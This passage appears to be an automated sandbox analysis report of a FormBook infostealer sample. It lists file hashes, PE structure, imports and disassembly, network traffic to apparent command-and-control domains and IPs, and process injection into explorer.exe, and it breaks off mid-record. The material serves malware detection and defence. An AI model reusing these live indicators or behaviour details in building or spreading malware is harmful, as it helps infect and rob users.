                                          Preview:3<.$$..$$$..(..(.$.$..,y.H..$$$...(..(.E..<...\*;$$.d.....E.1.d19......z0$.H..<b..$$.1..Rk\{[5..|9M9k.^.z...3...z0$.H...$$$..(..(.$.$..,.X6..\.$$$.d.+..8...TEl.d..8Sy.dSy.H..<.4.d....(.j.&.......T.(.....-;.G...z($.H.....<.F.......9u......9e...9=..,9M..8..L..<.d...0.9u.\......(.*..8...<.U.d...Sz<$..L..0..0.9u11.H.......$$$..(..(.$.$..,...f..\......<.l.L.i..(.4.i.4...8$..i.d....(.u..(.. .....z...I..].d...L.z...R..]....L......T..N.y..T..e....<..8.u:...<.8..L.l..(.o.d19.d..Sz<$.H..<b..$$.1..Rk\{[5..:.|9M9k...z...U...z0$.H.H.........h.A......N....j...`...f....l...B.....X.d..L..T..>..D..Z\.....L..f..\.....5.x...h..T.\.......V..4\......_...8\.....?.....4\&.....LU...H\<....!K[...\\"....@f...@\H.....(..P.f.L;...$$$..$$$.9.5.$$$...<..8.4.........4.L.....0.$.$$.M{[:....H..<.d....L......\.d.....@..$$$.;.5.$$$...(..8.4..L....<...P.d.9.A....@.y1:.d...Sz<$.H.H(.$$.......................................................

                                          C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe

                                          Download File
                                          Process:C:\Users\user\AppData\Local\Temp\iscan.exe
                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):125440
                                          Entropy (8bit):6.283809308716995
                                          Encrypted:false
                                          SSDEEP:3072:6sqyHK7EF9cU5FO/hcf9hUnBZFXBultTL6OhiF:BHK7o9W5uhSFXEY
                                          MD5:2B4B3369E04DEDD66517641DB0F5A8AB
                                          SHA1:A5E482597F6F2D68250A4EB28911683E50FAC4DE
                                          SHA-256:A4C4BF78E737CCADBABF71B57E5676A846D9ADFC5442344EDA8267325223B964
                                          SHA-512:67EB46AB147AD92DB741B60F851A78B6BF88F2DA93601542EE67D4FAAD448CECA73938207F5DAEB0153D5D2C1C84A64949CD7856F404C0781C4E9633727354CC
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 27%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..............................2......2......2................v..*......*.t....*......Rich...........PE..L....h.c.................f..........9.............@..........................@.......................................................0.............................. ...............................@...@............................................text....e.......f.................. ..`.rdata...k.......l...j..............@..@.data...(+..........................@....gfids....... ......................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.686417648025134
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:PrWP76ejHO.exe
                                          File size:318559
                                          MD5:db102a67350060a1e967aef81118f18d
                                          SHA1:a3131a3df17a154e41c09973ca8a9aabac29929e
                                          SHA256:98420cf47e19574739cff3f1f74bd3c6c70e103d0b28040b64fd3c77588c7ee7
                                          SHA512:daad205a305f7774164f0ed2298501e8a4cade236b93f63db31e40713a66a379145a2e9ca861f8c337dcb5e3a29cbe50b1b77589941e1e1c7090c950766de7a3
                                          SSDEEP:6144:NBn0ph65gGns2YvYPUaC55QAU4wVdsTbUi:EpoGHiO554Nbwb3
                                          TLSH:D664CD762170EF66D91F3830C86382F69667DE0ADE1457DFB6903E1A7832192F932643
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.*]...RF..RG.pRF.*]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........

                                          File Icon

                                          Icon Hash:d08eb292f2e89ce2

                                          Static PE Info

                                          General

                                          Entrypoint:0x40324f
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:ab6770b0a8635b9d92a5838920cfe770

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 00000180h
                                          push ebx
                                          push ebp
                                          push esi
                                          push edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+1Ch], ebx
                                          mov dword ptr [esp+14h], 00409130h
                                          xor esi, esi
                                          mov byte ptr [esp+18h], 00000020h
                                          call dword ptr [004070B8h]
                                          call dword ptr [004070B4h]
                                          cmp ax, 00000006h
                                          je 00007F5EF0F47EB3h
                                          push ebx
                                          call 00007F5EF0F4ACA1h
                                          cmp eax, ebx
                                          je 00007F5EF0F47EA9h
                                          push 00000C00h
                                          call eax
                                          push 004091E0h
                                          call 00007F5EF0F4AC22h
                                          push 004091D8h
                                          call 00007F5EF0F4AC18h
                                          push 004091CCh
                                          call 00007F5EF0F4AC0Eh
                                          push 0000000Dh
                                          call 00007F5EF0F4AC71h
                                          push 0000000Bh
                                          call 00007F5EF0F4AC6Ah
                                          mov dword ptr [00423F84h], eax
                                          call dword ptr [00407034h]
                                          push ebx
                                          call dword ptr [00407270h]
                                          mov dword ptr [00424038h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+34h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 0041F538h
                                          call dword ptr [00407160h]
                                          push 004091C0h
                                          push 00423780h
                                          call 00007F5EF0F4A8A1h
                                          call dword ptr [004070B0h]
                                          mov ebp, 0042A000h
                                          push eax
                                          push ebp
                                          call 00007F5EF0F4A88Fh
                                          push ebx
                                          call dword ptr [00407144h]

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x73cc0xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x9ee0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x5c4a0x5e00False0.659906914893617data6.410763775060762IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x70000x115e0x1200False0.4466145833333333data5.142548180775325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x90000x1b0780x600False0.455078125data4.2252195571372315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x2d0000x9ee00xa000False0.1594970703125data3.5990213744393147IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0x2d2800x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 11811 x 11811 px/mEnglishUnited States
                                          RT_ICON0x314a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 11811 x 11811 px/mEnglishUnited States
                                          RT_ICON0x33a500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 11811 x 11811 px/mEnglishUnited States
                                          RT_ICON0x34af80x1045PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                          RT_ICON0x35b400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 11811 x 11811 px/mEnglishUnited States
                                          RT_ICON0x364c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 11811 x 11811 px/mEnglishUnited States
                                          RT_DIALOG0x369300x100dataEnglishUnited States
                                          RT_DIALOG0x36a300x11cdataEnglishUnited States
                                          RT_DIALOG0x36b500x60dataEnglishUnited States
                                          RT_GROUP_ICON0x36bb00x5adataEnglishUnited States
                                          RT_MANIFEST0x36c100x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States

                                          Imports

                                          DLLImport
                                          KERNEL32.dllSetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
                                          USER32.dllGetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                          ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 30, 2022 02:22:22.784383059 CET4971080192.168.2.3195.110.124.133
                                          Nov 30, 2022 02:22:22.842713118 CET8049710195.110.124.133192.168.2.3
                                          Nov 30, 2022 02:22:22.842864037 CET4971080192.168.2.3195.110.124.133
                                          Nov 30, 2022 02:22:22.848509073 CET4971080192.168.2.3195.110.124.133
                                          Nov 30, 2022 02:22:22.906733036 CET8049710195.110.124.133192.168.2.3
                                          Nov 30, 2022 02:22:22.911145926 CET8049710195.110.124.133192.168.2.3
                                          Nov 30, 2022 02:22:22.914767981 CET8049710195.110.124.133192.168.2.3
                                          Nov 30, 2022 02:22:22.914897919 CET4971080192.168.2.3195.110.124.133
                                          Nov 30, 2022 02:22:22.914952993 CET4971080192.168.2.3195.110.124.133
                                          Nov 30, 2022 02:22:22.973588943 CET8049710195.110.124.133192.168.2.3
                                          Nov 30, 2022 02:22:27.959201097 CET4971180192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:28.016766071 CET804971181.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:28.018054008 CET4971180192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:28.018217087 CET4971180192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:28.075455904 CET804971181.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:28.078820944 CET804971181.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:28.078874111 CET804971181.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:28.079058886 CET4971180192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:29.031352043 CET4971180192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:30.171621084 CET4971280192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:30.229381084 CET804971281.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:30.229496002 CET4971280192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:30.229651928 CET4971280192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:30.287029982 CET804971281.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:30.288594961 CET804971281.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:30.288676023 CET804971281.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:30.288764954 CET4971280192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:31.238483906 CET4971280192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:32.250713110 CET4971380192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:32.308607101 CET804971381.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:32.308743954 CET4971380192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:32.309048891 CET4971380192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:32.366486073 CET804971381.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:32.366560936 CET804971381.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:32.366606951 CET804971381.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:32.366653919 CET804971381.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:32.373341084 CET804971381.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:32.373418093 CET804971381.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:32.373527050 CET4971380192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:33.312879086 CET4971380192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:34.328996897 CET4971480192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:34.387155056 CET804971481.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:34.387286901 CET4971480192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:34.387420893 CET4971480192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:34.445230007 CET804971481.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:34.450206041 CET804971481.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:34.450313091 CET804971481.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:34.450730085 CET4971480192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:34.451093912 CET4971480192.168.2.381.88.48.71
                                          Nov 30, 2022 02:22:34.509608984 CET804971481.88.48.71192.168.2.3
                                          Nov 30, 2022 02:22:39.630742073 CET4971580192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:39.798660994 CET804971550.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:39.798887014 CET4971580192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:39.798988104 CET4971580192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:39.966043949 CET804971550.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:39.973978996 CET804971550.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:39.974056005 CET804971550.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:39.974246979 CET4971580192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:40.820147991 CET4971580192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:41.832281113 CET4971680192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:41.999494076 CET804971650.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:42.001230001 CET4971680192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:42.001358032 CET4971680192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:42.168423891 CET804971650.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:42.176863909 CET804971650.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:42.176980972 CET804971650.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:42.177134991 CET4971680192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:43.016860962 CET4971680192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:44.035156012 CET4971780192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:44.203669071 CET804971750.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:44.203809977 CET4971780192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:44.204161882 CET4971780192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:44.372004032 CET804971750.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:44.372042894 CET804971750.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:44.372071028 CET804971750.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:44.372103930 CET804971750.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:44.372131109 CET804971750.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:44.379828930 CET804971750.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:44.379976034 CET804971750.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:44.380150080 CET4971780192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:45.204660892 CET4971780192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:46.220715046 CET4971880192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:46.387703896 CET804971850.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:46.387904882 CET4971880192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:46.388169050 CET4971880192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:46.555027008 CET804971850.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:46.590737104 CET804971850.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:46.642049074 CET4971880192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:56.607110977 CET804971850.87.143.200192.168.2.3
                                          Nov 30, 2022 02:22:56.607465029 CET4971880192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:56.607465029 CET4971880192.168.2.350.87.143.200
                                          Nov 30, 2022 02:22:56.774600029 CET804971850.87.143.200192.168.2.3
                                          Nov 30, 2022 02:23:01.713402987 CET4971980192.168.2.3194.58.112.174
                                          Nov 30, 2022 02:23:01.775351048 CET8049719194.58.112.174192.168.2.3
                                          Nov 30, 2022 02:23:01.775471926 CET4971980192.168.2.3194.58.112.174
                                          Nov 30, 2022 02:23:01.775626898 CET4971980192.168.2.3194.58.112.174
                                          Nov 30, 2022 02:23:01.837239027 CET8049719194.58.112.174192.168.2.3
                                          Nov 30, 2022 02:23:01.837311029 CET8049719194.58.112.174192.168.2.3
                                          Nov 30, 2022 02:23:01.837358952 CET8049719194.58.112.174192.168.2.3
                                          Nov 30, 2022 02:23:01.837461948 CET4971980192.168.2.3194.58.112.174

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 30, 2022 02:22:22.742185116 CET5238753192.168.2.38.8.8.8
                                          Nov 30, 2022 02:22:22.777436972 CET53523878.8.8.8192.168.2.3
                                          Nov 30, 2022 02:22:27.925657988 CET5692453192.168.2.38.8.8.8
                                          Nov 30, 2022 02:22:27.958118916 CET53569248.8.8.8192.168.2.3
                                          Nov 30, 2022 02:22:39.482861042 CET6062553192.168.2.38.8.8.8
                                          Nov 30, 2022 02:22:39.629431009 CET53606258.8.8.8192.168.2.3
                                          Nov 30, 2022 02:23:01.644376993 CET4930253192.168.2.38.8.8.8
                                          Nov 30, 2022 02:23:01.712326050 CET53493028.8.8.8192.168.2.3

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Nov 30, 2022 02:22:22.742185116 CET192.168.2.38.8.8.80x14f2Standard query (0)www.inhomeyoga.comA (IP address)IN (0x0001)false
                                          Nov 30, 2022 02:22:27.925657988 CET192.168.2.38.8.8.80xdff8Standard query (0)www.fedefarmatour.onlineA (IP address)IN (0x0001)false
                                          Nov 30, 2022 02:22:39.482861042 CET192.168.2.38.8.8.80xe02dStandard query (0)www.t4yfrance.comA (IP address)IN (0x0001)false
                                          Nov 30, 2022 02:23:01.644376993 CET192.168.2.38.8.8.80xd8c3Standard query (0)www.a8-group.comA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Nov 30, 2022 02:22:22.777436972 CET8.8.8.8192.168.2.30x14f2No error (0)www.inhomeyoga.cominhomeyoga.comCNAME (Canonical name)IN (0x0001)false
                                          Nov 30, 2022 02:22:22.777436972 CET8.8.8.8192.168.2.30x14f2No error (0)inhomeyoga.com195.110.124.133A (IP address)IN (0x0001)false
                                          Nov 30, 2022 02:22:27.958118916 CET8.8.8.8192.168.2.30xdff8No error (0)www.fedefarmatour.onlinefedefarmatour.onlineCNAME (Canonical name)IN (0x0001)false
                                          Nov 30, 2022 02:22:27.958118916 CET8.8.8.8192.168.2.30xdff8No error (0)fedefarmatour.online81.88.48.71A (IP address)IN (0x0001)false
                                          Nov 30, 2022 02:22:39.629431009 CET8.8.8.8192.168.2.30xe02dNo error (0)www.t4yfrance.comt4yfrance.comCNAME (Canonical name)IN (0x0001)false
                                          Nov 30, 2022 02:22:39.629431009 CET8.8.8.8192.168.2.30xe02dNo error (0)t4yfrance.com50.87.143.200A (IP address)IN (0x0001)false
                                          Nov 30, 2022 02:23:01.712326050 CET8.8.8.8192.168.2.30xd8c3No error (0)www.a8-group.com194.58.112.174A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • www.inhomeyoga.com
                                          • www.fedefarmatour.online
                                          • www.t4yfrance.com
                                          • www.a8-group.com

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:02:20:59
                                          Start date:30/11/2022
                                          Path:C:\Users\user\Desktop\PrWP76ejHO.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\PrWP76ejHO.exe
                                          Imagebase:0x400000
                                          File size:318559 bytes
                                          MD5 hash:DB102A67350060A1E967AEF81118F18D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low

                                          General

                                          Target ID:1
                                          Start time:02:21:00
                                          Start date:30/11/2022
                                          Path:C:\Users\user\AppData\Local\Temp\iscan.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
                                          Imagebase:0x400000
                                          File size:125440 bytes
                                          MD5 hash:2B4B3369E04DEDD66517641DB0F5A8AB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 27%, ReversingLabs
                                          Reputation:low

                                          General

                                          Target ID:2
                                          Start time:02:21:00
                                          Start date:30/11/2022
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff745070000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Target ID:3
                                          Start time:02:21:01
                                          Start date:30/11/2022
                                          Path:C:\Users\user\AppData\Local\Temp\iscan.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
                                          Imagebase:0x400000
                                          File size:125440 bytes
                                          MD5 hash:2B4B3369E04DEDD66517641DB0F5A8AB
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Target ID:4
                                          Start time:02:21:06
                                          Start date:30/11/2022
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff69fe90000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          General

                                          Target ID:5
                                          Start time:02:21:13
                                          Start date:30/11/2022
